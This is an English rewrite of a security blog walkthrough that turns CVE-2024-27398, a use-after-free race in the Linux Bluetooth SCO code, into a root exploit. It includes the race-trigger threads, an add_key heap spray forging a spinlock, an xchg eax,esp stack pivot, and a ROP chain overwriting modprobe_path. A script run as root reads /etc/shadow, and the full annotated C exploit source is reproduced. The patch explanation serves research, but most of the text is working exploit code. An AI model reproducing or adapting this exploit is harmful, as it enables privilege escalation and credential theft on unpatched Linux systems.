Source attribution. This is an original English rewrite of “CVE-2024-27398 — Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass”, published on Secunnix Cyber Security on 2026-04-25 (author not clearly listed — byline reads “Yayıncı: Anonymous”). The original carries an “All rights reserved” notice (© Secunnix Cyber Security — Tüm hakları saklıdır.), so this is a paraphrased English rewrite, not a verbatim translation. All figures, code samples, and the POC animation are reproduced from the original at their original positions, with credit. Vulnerability research credited to the upstream PoC author sty886; the original article also credits lkmidas for the modprobe_path root technique.

Executive Summary
CVE-2024-27398 is a race-induced use-after-free in the Linux kernel’s Bluetooth SCO (Synchronous Connection-Oriented link) subsystem, fixed in Linux 6.8.2+. Two concurrent connect() calls on the same SCO socket can be raced into creating two sco_conn objects with two independent delayed_work timers; close() only cancels the timer attached to the surviving connection, leaving the other orphan timer pending against an sk that gets freed. About two seconds later the orphan timer fires inside sco_sock_timeout(), walks sk->sk_lock, reads sk->sk_err, and invokes sk->sk_state_change(sk) — an arbitrary function pointer that, by then, the attacker controls.
The Secunnix walkthrough chains the bug into a clean local privilege escalation on a tuned 6.8.0 lab kernel. Heap spray is done with add_key(2) — user_key_payload headers are 24 bytes, so a 980-byte payload lands in kmalloc-1024, the same merged cache the freed sco_pinfo came from. The spray forges a valid-looking DEBUG_SPINLOCK at offset 0x80 (so do_raw_spin_lock‘s magic check passes) and overwrites the sk_state_change function pointer with the address of an xchg eax, esp ; ret gadget in kernel text. When the timer fires, the swap pivots the kernel stack into a userspace page mapped at 0x81011000, and a pure-ROP chain calls memcpy(modprobe_path, "/tmp/x", 7). Executing an invalid-magic binary triggers call_usermodehelper, which runs the attacker’s script as root. SMEP is bypassed because no userspace code is executed — every instruction runs from .text; SMAP is disabled in the lab so the kernel can read the userspace ROP chain. The article walks through the bug, the lab, the structure layout, the spray, the gadget, the chain, the patch, and provides the full annotated POC.
Introduction
The original author opens by saying they stumbled across a minimal PoC for CVE-2024-27398 in sty886/sco-race-condition — just enough code to trigger the race — and decided to take it the rest of the way: heap-spray to reclaim the freed slot, forge the spinlock pattern, build a pivot, and turn it into root. All screenshots in this post are captured live from real QEMU/KVM runs against a custom Linux 6.8 lab kernel. The intended reader is comfortable with the SLUB allocator, can read C and x86-64 assembly fluently, and wants to see why every choice was made, not just what was done.
1. The Vulnerability
1.1 Vulnerable code
The bug lives in net/bluetooth/sco.c‘s sco_sock_timeout(), scheduled as delayed_work on the system workqueue whenever an SCO connection attempt is allowed to time out. The handler takes the per-socket spinlock, sets an error, and invokes the socket’s state-change callback:
static void sco_sock_timeout(struct work_struct *work)
{
struct sco_conn *conn = container_of(work, struct sco_conn,
timeout_work.work);
struct sock *sk;
sk = conn->sk;
if (!sk)
return;
bh_lock_sock(sk); /* [1] acquires sk->sk_lock.slock */
sk->sk_err = ETIMEDOUT;
sk->sk_state_change(sk); /* [2] ← function pointer call */
bh_unlock_sock(sk);
sock_put(sk); /* [3] drops refcount */
}
If sk has been freed and its slot reclaimed by an attacker-controlled allocation by the time the timer fires, sk->sk_state_change is whatever the attacker wrote — arbitrary kernel-mode RIP control.
1.2 The race condition
Two concurrent connect() calls on the same SCO socket can each create their own sco_conn and schedule their own timer. The trimmed-down diff that summarises where the locking went wrong:
sco_connect() inside sco_sock_connect():
- lock_sock(sk); /* was here: serialized connect attempts */
err = sco_chan_add(conn, sk, NULL);
if (sk->sk_state == BT_CONNECTED)
sco_sock_set_timer(sk, sk->sk_sndtimeo);
- release_sock(sk);
And in sco_sock_connect() itself:
+ lock_sock(sk);
if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+ release_sock(sk);
return -EBADFD;
}
- lock_sock(sk);
bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
- release_sock(sk);
err = sco_connect(sk);
- lock_sock(sk);
err = bt_sock_wait_state(...);
1.3 Race timeline
Two threads, two different destination addresses, simultaneous connect(). Both create a sco_conn and arm a 2-second timer. The last write to sco_pi(sk)->conn wins. When the userspace caller closes the socket, only that surviving connection’s timer is cancelled; the other timer keeps pointing at conn->sk, which is freed roughly straight away. Two seconds later, the orphan timer’s callback executes against memory the attacker now controls.
1.4 The official patch
Linux 6.8.2 fixed this with three coordinated changes: (1) a sco_conn_lock mutex to serialise access; (2) sock_hold(sk) before the timer is scheduled and sock_put(sk) at the end of sco_sock_timeout(), so the socket can’t be freed underneath the timer; (3) replacing async cancel_delayed_work() with cancel_delayed_work_sync() so teardown waits for any already-running timer handler to finish.
2. Lab Setup
2.1 Kernel configuration
A custom Linux 6.8 build with a few deliberate choices. Bluetooth compiled in (CONFIG_BT=y, CONFIG_BT_BREDR=y, CONFIG_BT_HCIVHCI=y for /dev/vhci). SLUB enabled, CONFIG_SLAB_MERGE_DEFAULT=y. Crucially, CONFIG_KASAN=n and CONFIG_MEMCG_KMEM=n: with either of those enabled, the SCO cache wouldn’t merge into the generic kmalloc-1024 and the add_key spray would never reach the freed slot. CONFIG_DEBUG_SPINLOCK=y widens the race window and pushes sco_pinfo into the 1024-byte cache. CONFIG_LOCKDEP=n stops the lock validator from tripping on the synthetic spinlock that lives inside the spray payload.
2.2 QEMU launch parameters
qemu-system-x86_64
-m 4096
-smp 2
-cpu host,+smep,-smap
-enable-kvm
-kernel linux-6.8/arch/x86/boot/bzImage
-initrd exploit.cpio.gz
-append "console=ttyS0 nokaslr loglevel=7
panic_on_oops=0 hung_task_timeout_secs=0
lockdep=off"
-nographic
-no-reboot
| Parameter | Reason |
|---|---|
-cpu host,+smep,-smap | SMEP on (forces pure-ROP); SMAP off (kernel reads userspace pivot page) |
nokaslr | All kernel addresses fixed — no info leak needed |
panic_on_oops=0 | Kernel oops at RIP=0x0 does not kill the machine — exploit continues |
lockdep=off | Lock validator would trip on the fake-but-valid spinlock spray data |
-smp 2 | Two CPUs required for the race to be meaningful |
3. Target Structure Analysis
3.1 struct sco_pinfo layout
struct sco_pinfo {
struct sock sk; /* must be first — pointer cast magic */
bdaddr_t src;
bdaddr_t dst;
__u32 flags;
__u16 setting;
__u8 cmsg_mask;
struct bt_codec codec;
struct sco_conn *conn;
};
With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner for debugging). That inflates struct sock and pushes sco_pinfo to 984 bytes — SLUB rounds it to kmalloc-1024.
3.2 Critical offsets in struct sock
$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
struct sock sk; /* 0 904 */
... /* 904 80 */
/* size: 984, cachelines: 16, members: 7 */
};
$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
socket_lock_t sk_lock; /* 152 72 */
void (*sk_state_change)(struct sock *); /* 824 8 */
So sk_lock sits at offset 0x98 (152) and sk_state_change at 0x338 (824).
3.3 socket_lock_t internals (DEBUG_SPINLOCK=y)
socket_lock_t (72 bytes total):
+0x00 spinlock_t slock (24 bytes):
+0x00 raw_lock.val (4B) ← 0 = unlocked
+0x04 magic (4B) ← MUST be 0xdead4ead
+0x08 owner_cpu (4B) ← -1 = unowned
+0x0C pad (4B)
+0x10 owner (8B) ← (void*)-1 = unowned
+0x18 owned (4B)
+0x1C pad (4B)
+0x20 wq (wait_queue_head_t) (40B)
The magic field is checked by do_raw_spin_lock() on every acquisition. If it doesn’t equal 0xdead4ead, the kernel warns and may panic. The spray has to forge this faithfully or the chain dies before reaching sk_state_change.
4. Exploit Stage 1: Triggering the UAF
4.1 Virtual HCI setup
No real Bluetooth hardware is needed. /dev/vhci exposes a virtual HCI controller; the exploit just has to answer the HCI command stream the kernel issues during stack init:
/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);
/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);
/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);
/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0); /* _IOW(0x48, 201, int) */
close(hfd);
sleep(4); /* wait for HCI initialization sequence to complete */
printf("[*] HCI readyn");
The vHCI thread answers HCI_Create_Connection by forging a Connection-Complete event with handle = 1, so the kernel state machine moves forward without ever talking to a real radio:
case 0x0401: { /* HCI_Create_Connection */
uint8_t ev[20] = {0};
ev[0] = 4; /* HCI_EVENT_PKT */
ev[1] = 0x03; /* HCI_EV_CONN_COMPLETE */
ev[2] = 11; /* parameter length */
ev[3] = 0; /* status = success */
ev[4] = 0x01; ev[5] = 0x00; /* handle = 1 */
memcpy(&ev[6], &buf[4], 6); /* copy BD_ADDR from command */
ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
write(vfd, ev, 14);
break;
}

xchg eax, esp gadget at 0xffffffff81011cf1 is selected as the stack pivot, two userspace pages are mapped. Source: original article.
/dev/vhci. Source: original article.4.2 Race trigger per iteration
Per race attempt: open an SCO socket, set a 2-second send timeout, spin up two threads that connect() simultaneously to two different destination addresses (one all-zeros, one all-ones), join, close, then spray:
for (int batch = 0; batch < 100; batch++) {
/* 2000 race attempts + 2000 add_key calls per batch */
for (int i = 0; i < BATCH_SZ; i++) {
/* [1] Trigger race → create orphan timer → free sk */
g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
pthread_barrier_init(&g_bar, NULL, 2);
pthread_create(&t1, NULL, c1, NULL);
pthread_create(&t2, NULL, c2, NULL);
pthread_join(t1, NULL); pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);
close(g_fd); /* ← sk freed here */
/* [2] Spray — try to land in the freed slot */
char desc[32];
snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
}
/* [3] Wait for orphan timers to fire */
printf("[*] Waiting 3s...n");
sleep(3);
/* [4] Trigger modprobe if modprobe_path was overwritten */
for (int t = 0; t < 5; t++) {
system("/tmp/dummy 2>/dev/null; true");
usleep(500000);
if (access("/tmp/pwn", F_OK) == 0) goto win;
}
}

connect() calls. Source: original article.
SO_SNDTIMEO=2s timer to fire against freed memory. Source: original article.5. Exploit Stage 2: Heap Spray via add_key
5.1 Why add_key?
The add_key(2) syscall with key type "user" allocates a user_key_payload (24-byte header) plus the caller’s payload. With datalen = 980 the total allocation is 1004 bytes — rounded up to kmalloc-1024, the same merged cache the freed sco_pinfo lives in (when KASAN/MEMCG are off).
5.2 Spray payload layout
Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes) │
│ +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B) │
├──────────────────────────────────────────────────────┤ ← payload_data[0]
│ [maps to sk+0x18] │
│ ... │
│ [maps to sk+0x98 = sk_lock.slock] │
│ payload_data[0x80] raw_lock = 0x00000000 │ ← unlocked
│ payload_data[0x84] magic = 0xdead4ead │ ← REQUIRED
│ payload_data[0x88] owner_cpu = 0xffffffff │ ← -1 (unowned)
│ payload_data[0x8c] pad = 0x00000000 │
│ payload_data[0x90] owner = 0xffffffffffffffff│ ← (void*)-1
│ ... │
│ [maps to sk+0x338 = sk_state_change] │
│ payload_data[0x320] = 0xffffffff81011cf1 │ ← our gadget
└──────────────────────────────────────────────────────┘
static char g_kd[980];
static void build_spray(void) {
memset(g_kd, 0, sizeof(g_kd));
int h = 24; /* user_key_payload header size */
/* sk+0x98: valid unlocked DEBUG_SPINLOCK */
int slock = SK_LOCK_OFF - h; /* 0x98 - 0x18 = 0x80 */
*(uint32_t*)(g_kd + slock + 0) = 0; /* raw_lock = unlocked */
*(uint32_t*)(g_kd + slock + 4) = 0xdead4ead; /* magic — checked by kernel */
*(uint32_t*)(g_kd + slock + 8) = 0xffffffff; /* owner_cpu = -1 */
*(uint32_t*)(g_kd + slock + 12) = 0;
*(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */
/* sk+0x338: overwrite sk_state_change with our pivot gadget */
*(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
/* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}
5.3 The spray loop
100 batches × 2000 iterations. Each iteration triggers the race, closes the socket, sprays once with add_key. Between batches, sleep 3 s so the SO_SNDTIMEO=2s timers can fire, then up to five attempts to launch /tmp/dummy — if modprobe_path was overwritten, the kernel will dispatch the attacker’s script and /tmp/pwn will appear.
6. Exploit Stage 3: UAF Fires — KASAN Detection
On a KASAN-enabled build, the UAF is loud: when the orphan timer runs, do_raw_spin_lock reads the freed spinlock’s magic field and KASAN catches the access. The workqueue context (sco_sock_timeout) is explicitly labelled in the report. On the exploitation kernel (KASAN off), the same access is silent: the spray has forged 0xdead4ead, the magic check passes, the lock is “taken”, and execution carries on to the function pointer call.

BUG: KASAN: slab-use-after-free in do_raw_spin_lock — the orphan timer dereferences a freed sk. Source: original article.
sco_sock_timeout workqueue context. Source: original article.7. Exploit Stage 4: SMEP Bypass via xchg eax, esp
7.1 Why we can’t jump to shellcode
SMEP (Supervisor Mode Execution Prevention) faults if the kernel’s RIP ever lands on a userspace address. A naive callback-to-userspace-shellcode primitive cannot work. ROP solves it: every instruction executes from kernel .text; ROP just reads chain data from userspace memory, which SMEP is fine with (SMAP would object, but SMAP is off here).
7.2 The xchg eax, esp ; ret gadget
Two bytes — 94 c3 — appear at 0xffffffff81011cf1. When the kernel jumps there via sk_state_change(sk), RAX is the gadget’s own address. The instruction swaps the low 32 bits of RAX and RSP; RSP is then zero-extended from 0x81011cf1 to 0x0000000081011cf1 — a userspace address. The subsequent ret reads the first ROP gadget from that userspace page.
7.3 Mapping the pivot page
Two consecutive userspace pages at 0x81011000–0x81012fff are mmap’d with MAP_FIXED to hold the chain. SMEP doesn’t prevent the kernel from reading them; SMAP is off, so it doesn’t prevent that either.
7.4 Building the ROP chain
/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET 0xffffffff8104c1adUL /* pop rdi; ret */
#define POP_RSI_RET 0xffffffff811bb9beUL /* pop rsi; ret */
#define POP_RDX_RET 0xffffffff810bc1b2UL /* pop rdx; ret */
#define MEMCPY_ADDR 0xffffffff82905e70UL /* kernel memcpy */
#define MODPROBE_PATH 0xffffffff8356a020UL /* modprobe_path symbol */
#define STRING_PAGE 0xdead0000UL /* userspace: "/tmp/x" */
uint64_t *rop = (uint64_t*)(PIVOT_ADDR); /* 0x81011cf1 */
rop[0] = POP_RDI_RET; /* pop rdi; ret */
rop[1] = MODPROBE_PATH; /* rdi = &modprobe_path */
rop[2] = POP_RSI_RET; /* pop rsi; ret */
rop[3] = STRING_PAGE; /* rsi = 0xdead0000 ("/tmp/x") */
rop[4] = POP_RDX_RET; /* pop rdx; ret */
rop[5] = 7; /* rdx = 7 */
rop[6] = MEMCPY_ADDR; /* memcpy(dst, src, len) */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
/* cascade into zeroed memory → RIP=0 → oops */
0x81011000 [page boundary]
...
0x81011cf1 rop[0] = 0xffffffff8104c1ad pop rdi; ret
0x81011cf9 rop[1] = 0xffffffff8356a020 modprobe_path
0x81011d01 rop[2] = 0xffffffff811bb9be pop rsi; ret
0x81011d09 rop[3] = 0x00000000dead0000 STRING_PAGE
0x81011d11 rop[4] = 0xffffffff810bc1b2 pop rdx; ret
0x81011d19 rop[5] = 0x0000000000000007 length = 7
0x81011d21 rop[6] = 0xffffffff82905e70 memcpy
0x81011d29 rop[7] = 0xffffffff81011cf2 trailing ret
0x81011d31 0x0000000000000000 ← crash here (RIP=0)
...
0x81013000 [page boundary]
8. Exploit Stage 5: RIP Control and Kernel Oops
The sequence at firing time:
bh_lock_sock(sk)reads the forgedmagic = 0xdead4ead, the magic check passes, “lock acquired”.sk->sk_err = ETIMEDOUT— harmless write.sk->sk_state_change(sk)jumps to ourxchg eax, esp ; retgadget.xchgswapsRAXandRSP, redirecting the kernel stack into userspace.retloads the first ROP gadget address from0x81011cf1.- The three
pop reg ; retgadgets stageRDI,RSI,RDX. memcpy(modprobe_path, "/tmp/x", 7)runs in kernel context.- Trailing
rets cascade into zeroed memory untilRIP = 0x0and the kernel oopses. Becausepanic_on_oops=0, the machine survives, and the offending task is killed.

RIP=0x0000000000000000 after the ROP chain’s trailing ret sled drops into zeroed memory. Source: original article.
RSP=0x0000000081011d39 after the xchg eax, esp pivots the kernel stack into userspace where the ROP chain lives. Source: original article.
memcpy() returns; RAX holds modprobe_path — proof the chain ran inside the kernel. Source: original article.9. Exploit Stage 6: Root via modprobe_path
9.1 How modprobe_path gives us root
When the kernel encounters an unrecognised binary format (the canonical trigger: an executable whose first 4 bytes don’t match any registered handler), it calls request_module("binfmt-XXXX"), which internally invokes call_usermodehelper(modprobe_path, ...) as root, bypassing all userspace privilege checks. modprobe_path normally points to /sbin/modprobe. Overwriting it to /tmp/x means the kernel runs the attacker’s shell script as uid=0.
9.2 The root script
FILE *f = fopen("/tmp/x", "w");
fprintf(f,
"#!/bin/shn"
"echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwnn"
"uname -a >> /tmp/pwnn"
"id >> /tmp/pwnn"
"echo '--- /etc/shadow ---' >> /tmp/pwnn"
"cat /etc/shadow >> /tmp/pwn 2>/dev/nulln"
"echo '--- ROOTED ---' >> /tmp/pwnn");
fclose(f);
chmod("/tmp/x", 0755);
int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "xffxffxffxff", 4); /* invalid ELF magic */
close(d);
9.3 Triggering and confirming root
After each 3-second wait, the exploit invokes /tmp/dummy up to five times. The kernel sees an unrecognised binary format, calls request_module(), which calls call_usermodehelper("/tmp/x", ...) as root, which runs the script — which writes the uid=0 banner into /tmp/pwn. The exploit then access("/tmp/pwn"); if it exists, root was achieved.

[!!!] ROOT! (SMEP BYPASS); /tmp/pwn contains the banner written by the script the kernel just ran on our behalf. Source: original article.10. Full Exploit Source

The complete annotated C source, reproduced verbatim from the original article:
/*
* CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
*
* Vulnerability: Use-After-Free in sco_sock_timeout() via race in
* sco_sock_connect()/sco_connect() — missing lock_sock serialization.
*
* Technique:
* sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
* xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
* ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
* All gadgets in kernel .text → SMEP bypassed
* SMAP must be off (nosmap) → kernel reads userspace ROP data
*
* Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
* CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
*/
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>
/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ───────────── */
#define XCHG_EAX_ESP 0xffffffff81011cf1UL /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR (XCHG_EAX_ESP & 0xFFFFFFFF) /* → 0x81011cf1 */
#define POP_RDI_RET 0xffffffff8104c1adUL /* 5f c3: pop rdi; ret */
#define POP_RSI_RET 0xffffffff811bb9beUL /* 5e c3: pop rsi; ret */
#define POP_RDX_RET 0xffffffff810bc1b2UL /* 5a c3: pop rdx; ret */
#define MEMCPY_ADDR 0xffffffff82905e70UL /* kernel memcpy() */
#define MODPROBE_PATH 0xffffffff8356a020UL /* char modprobe_path[256] */
#define STRING_PAGE 0xdead0000UL /* userspace page: "/tmp/x" */
/* ── struct sock field offsets ──────────────────────────────────────── */
#define SK_LOCK_OFF 0x98 /* socket_lock_t sk_lock (pahole verified) */
#define SK_STCHG_OFF 0x338 /* sk_state_change fptr (pahole verified) */
#define PG 4096
#define BTPROTO_HCI 1
#define BTPROTO_SCO 2
#define BATCH_SZ 2000
typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };
/* ── vHCI state ─────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;
/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
uint8_t buf[512], resp[300], extra[248];
struct pollfd pf = {.fd = vfd, .events = POLLIN};
while (!vstop) {
if (poll(&pf, 1, 100) <= 0) continue;
int n = read(vfd, buf, sizeof(buf));
if (n < 4 || buf[0] != 1) continue; /* must be HCI_COMMAND_PKT */
memset(extra, 0, sizeof(extra));
int el = 248;
uint16_t op = buf[1] | (buf[2] << 8);
switch (op) {
case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
case 0x1002: memset(extra, 0xff, 64); break;
case 0x1003: extra[0]=0xff; extra[1]=0xff; extra[2]=0x8f;
extra[3]=0xfe; extra[4]=0xdb; extra[5]=0xff;
extra[6]=0x5b; extra[7]=0x87; break;
case 0x1004: case 0x1005:
extra[0] = n > 4 ? buf[4] : 0;
extra[1] = 1; memset(&extra[2], 0xff, 8); break;
case 0x100b: extra[0]=0xff; extra[1]=0x03; extra[2]=0xff;
extra[3]=0x0a; extra[5]=0x08; break;
case 0x0c14: memcpy(extra, "vhci", 4); break;
case 0x200b: case 0x200c: memset(extra, 0xff, 8); break;
case 0x2003: extra[0]=0xfb; extra[2]=0x0f; break;
case 0x0406: el = 8; break;
case 0x0401: { /* HCI_Create_Connection → send Connection Complete */
uint8_t ev[20] = {0};
ev[0]=4; ev[1]=0x03; ev[2]=11; ev[3]=0;
ev[4]=0x01; ev[5]=0x00; /* handle = 1 */
if (n >= 10) memcpy(&ev[6], &buf[4], 6);
ev[12]=0x01; ev[13]=0x00;
write(vfd, ev, 14);
break;
}
default: el = 8; break;
}
int pl = 4 + el;
if (pl > 255) pl = 255;
resp[0]=4; resp[1]=0x0e; resp[2]=pl; resp[3]=1;
resp[4]=buf[1]; resp[5]=buf[2]; resp[6]=0;
if (el > 0) memcpy(&resp[7], extra, pl - 4);
write(vfd, resp, 3 + pl);
}
return NULL;
}
/* ── Race threads ────────────────────────────────────────────────── */
static int g_fd;
static pthread_barrier_t g_bar;
static void *c1(void *a) {
struct sockaddr_sco sa = {.f = AF_BLUETOOTH}; /* dst = 00:00:...:00 */
pthread_barrier_wait(&g_bar);
connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
return NULL;
}
static void *c2(void *a) {
struct sockaddr_sco sa = {.f = AF_BLUETOOTH};
memset(&sa.a, 0xff, 6); /* dst = FF:FF:...:FF */
pthread_barrier_wait(&g_bar);
connect(g_fd, (struct sockaddr*)&sa, sizeof(sa));
return NULL;
}
/* ── Heap spray payload ──────────────────────────────────────────── */
static char g_kd[980];
static void build_spray(void) {
memset(g_kd, 0, sizeof(g_kd));
int h = 24; /* sizeof(struct user_key_payload) header */
/*
* Overwrite sk_lock.slock with a valid-looking unlocked spinlock.
* bh_lock_sock() reads magic (must be 0xdead4ead) and checks
* owner_cpu/-1. Without this, the kernel panics before reaching
* sk_state_change.
*/
int slock = SK_LOCK_OFF - h; /* 0x98 - 0x18 = 0x80 */
*(uint32_t*)(g_kd + slock + 0) = 0; /* raw_lock = 0 */
*(uint32_t*)(g_kd + slock + 4) = 0xdead4ead; /* magic */
*(uint32_t*)(g_kd + slock + 8) = 0xffffffff; /* owner_cpu = -1 */
*(uint32_t*)(g_kd + slock + 12) = 0;
*(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */
/* Overwrite sk_state_change with our stack pivot gadget */
*(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
}
int main(void) {
printf("=== CVE-2024-27398 LPE (SMEP BYPASS) ===n");
fflush(stdout);
/* [1] Create root payload script */
FILE *f = fopen("/tmp/x", "w");
if (f) {
fprintf(f,
"#!/bin/shn"
"echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwnn"
"uname -a >> /tmp/pwnn"
"id >> /tmp/pwnn"
"echo '--- /etc/shadow ---' >> /tmp/pwnn"
"cat /etc/shadow >> /tmp/pwn 2>/dev/nulln"
"echo '--- ROOTED ---' >> /tmp/pwnn");
fclose(f);
}
chmod("/tmp/x", 0755);
/* [2] Create invalid-magic binary to trigger modprobe */
{
int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
if (d >= 0) { write(d, "xffxffxffxff", 4); close(d); }
}
/* [3] Map string page (nosmap: kernel reads this during memcpy) */
void *sp = mmap((void*)STRING_PAGE, PG, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
memcpy(sp, "/tmp/x", 7);
/* [4] Map pivot page and write ROP chain */
void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);
void *pp = mmap(pivot_page, 2*PG, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if (pp == MAP_FAILED) { perror("mmap pivot"); return 1; }
memset(pp, 0, 2*PG);
uint64_t *rop = (uint64_t*)(PIVOT_ADDR);
rop[0] = POP_RDI_RET;
rop[1] = MODPROBE_PATH; /* rdi = &modprobe_path */
rop[2] = POP_RSI_RET;
rop[3] = STRING_PAGE; /* rsi = "/tmp/x" (nosmap) */
rop[4] = POP_RDX_RET;
rop[5] = 7; /* rdx = 7 */
rop[6] = MEMCPY_ADDR; /* memcpy(modprobe_path, "/tmp/x", 7) */
rop[7] = XCHG_EAX_ESP + 1; /* trailing ret sled → eventual crash */
printf("[+] Pivot page at %p, ROP at 0x%lxn", pp, PIVOT_ADDR);
fflush(stdout);
/* [5] Set up vHCI and bring up hci0 */
build_spray();
vfd = open("/dev/vhci", O_RDWR);
if (vfd < 0) { perror("vhci"); return 1; }
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);
pthread_t vt;
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
if (hfd >= 0) { ioctl(hfd, _IOW(0x48, 201, int), 0); close(hfd); }
sleep(4);
printf("[*] HCI readyn");
fflush(stdout);
/* [6] Main race + spray loop */
char desc[32];
struct timeval tv = {.tv_sec = 2};
for (int batch = 0; batch < 100; batch++) {
printf("[*] Batch %dn", batch);
fflush(stdout);
for (int i = 0; i < BATCH_SZ; i++) {
g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK,
BTPROTO_SCO);
if (g_fd < 0) continue;
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
pthread_barrier_init(&g_bar, NULL, 2);
pthread_t t1, t2;
pthread_create(&t1, NULL, c1, NULL);
pthread_create(&t2, NULL, c2, NULL);
pthread_join(t1, NULL);
pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);
close(g_fd); /* frees sk; orphan conn_A timer still pending */
/* Spray: try to reclaim the freed sco_pinfo slot */
snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd),
KEY_SPEC_SESSION_KEYRING);
}
/* Wait for SO_SNDTIMEO timers to fire */
printf("[*] Waiting 3s...n");
fflush(stdout);
sleep(3);
/* Poll: did modprobe_path get overwritten? */
for (int t = 0; t < 5; t++) {
system("/tmp/dummy 2>/dev/null; true");
usleep(500000);
if (access("/tmp/pwn", F_OK) == 0) goto win;
}
printf("[*] No luck this batchn");
fflush(stdout);
}
printf("[-] Done — no rootn");
vstop = 1;
close(vfd);
return 0;
win:
printf("n[!!!] ROOT! (SMEP BYPASS)n[*] /tmp/pwn:n");
fflush(stdout);
system("cat /tmp/pwn");
fflush(stdout);
vstop = 1;
close(vfd);
return 0;
}
11. End-to-End Execution Flow
┌──────────────────────────────────────────────────────────────────────┐
│ FULL EXPLOITATION CHAIN │
├──────────────────────────────────────────────────────────────────────┤
│ │
│ SETUP │
│ ├── mmap 0xdead0000 → "/tmp/x" (string for memcpy src) │
│ ├── mmap 0x81011000 → ROP chain (pivot destination) │
│ ├── build spray payload: │
│ │ +0x80: spinlock magic=0xdead4ead (passes bh_lock_sock) │
│ │ +0x320: sk_state_change=0xffffffff81011cf1 (our gadget) │
│ └── /tmp/x, /tmp/dummy created │
│ │
│ BLUETOOTH INIT │
│ ├── open /dev/vhci → virtual hci0 created │
│ ├── vhci_thread: answers HCI commands from kernel │
│ └── HCIDEVUP ioctl → hci0 UP, BT stack ready │
│ │
│ RACE + SPRAY LOOP (per iteration) │
│ ├── socket(AF_BLUETOOTH, SEQPACKET|NONBLOCK, BTPROTO_SCO) │
│ ├── setsockopt(SO_SNDTIMEO, 2s) │
│ ├── barrier.wait → c1+c2 connect simultaneously │
│ │ c1 → addr 00:00:00:00:00:00 → conn_A + timer_A (2s) │
│ │ c2 → addr FF:FF:FF:FF:FF:FF → conn_B + timer_B (2s) │
│ │ sco_pi(sk)->conn = conn_B (last write wins) │
│ ├── close(fd) → cancel_delayed_work(conn_B->timeout) │
│ │ → conn_A timer ORPHANED, sk FREED │
│ └── add_key("user", desc, payload, 980, ...) → kmalloc(1004) │
